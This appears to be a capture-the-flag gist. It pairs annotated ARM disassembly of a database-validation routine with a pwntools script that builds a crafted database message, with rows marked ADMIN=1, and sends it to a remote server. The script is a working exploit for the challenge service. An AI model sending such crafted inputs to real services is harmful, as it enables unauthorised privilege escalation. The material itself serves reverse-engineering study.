__text:00000BF4 LDR R0, [SP,#0x2C+COLUMN_DATA]
__text:00000BF6 ADDS R0, #0x11 ; SIZEOF COLUMN
__text:00000BF8 STR R0, [SP,#0x2C+COLUMN_DATA]
COLUMN_NUMBER++
__text:00000BFA LDR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BFC ADDS R0, #1
__text:00000BFE STR R0, [SP,#0x2C+COLUMN_NUMBER]
CONTINUE LOOOOOOOP
__text:00000C00 B loc_BCA
; -------- END LOOOOOOP
TOTAL_BYTES += COLUMNSIZE_CUMULATIVE * NUM_ROWS
__text:00000C02 loc_C02 ; CODE XREF: _validate_database+DAj
__text:00000C02 LDR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000C04 LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000C06 LDRH R1, [R1,#0xA]
__text:00000C08 MULS R0, R1
__text:00000C0A LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000C0C ADD R0, R1
__text:00000C0E STR R0, [SP,#0x2C+TOTAL_BYTES]
IF BUFFERSIZE < TOTAL_BYTES
EXIT
__text:00000C10 LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000C12 LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000C14 CMP R0, R1
__text:00000C16 BCS loc_C22
__text:00000C18 MOVS R0, #0
__text:00000C1E STR R0, [SP,#0x2C+var_C]
__text:00000C20 B loc_EXIT
Database is OK!
__text:00000C22 loc_C22 ; CODE XREF: _validate_database+11Ej
__text:00000C22 MOVS R0, #1
__text:00000C28 STR R0, [SP,#0x2C+var_C]
__text:00000C2A
Database NOT OK!
__text:00000C2A loc_EXIT ; CODE XREF: _validate_database+26j
__text:00000C2A ; _validate_database+40j ...
__text:00000C2A LDR R0, [SP,#0x2C+var_C]
__text:00000C2C ADD SP, SP, #0x24
__text:00000C2E POP {R7,PC}
__text:00000C2E ; End of function _validate_database
Raw
wololo.py
#!/usr/bin/env python
from pwn import *
from collections import OrderedDict
context(log_level='debug')
ColumnTypeId = {
'int8': 0,
'int16': 1,
'int32': 2,
'int64': 3,
'sz8': 4,
'sz16': 5,
'sz32': 6,
'timestamp': 7
}
ColumnSizes = {
'int8': 1,
'int16': 2,
'int32': 4,
'int64': 8,
'sz8': 8,
'sz16': 16,
'sz32': 32,
'timestamp': 9999
}
Columns = OrderedDict({
'USERNAME': 'sz16',
'PASSWORD': 'sz32',
'ADMIN': 'int8',
'ISAWESOME': 'int8',
'TRASH': 'int32'
})
Rows = [
{
'USERNAME': 'captainfalcon',
'PASSWORD': 'fc03329505475dd4be51627cc7f0b1f1',
'ADMIN': 1,
'ISAWESOME': 1,
'TRASH': 0
},
] * 4
Header = p32(0x4F4C4F57) # Magic
Header += p32(1) # Version
Header += p16(len(Columns)) # nColumns
Header += p16(len(Rows)) # nRows
ColumnData = ''
for Column, Type in Columns.items():
ColumnData += p8(ColumnTypeId[Type])
ColumnData += Column.ljust(0x10,'\x00')
RowData = ''
for Row in Rows:
for Column, Type in Columns.items():
Size = ColumnSizes[Type]
Data = flat(Row[Column])
Data = Data.ljust(Size,'\x00')[:Size]
RowData += Data
Message = Header + ColumnData + RowData
print hexdump(Header)
print hexdump(ColumnData, 17)
print hexdump(RowData)
r = remote('54.164.98.39', 2510)
r.send(p32(len(Message)))
r.send(Message)
print r.recvall()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment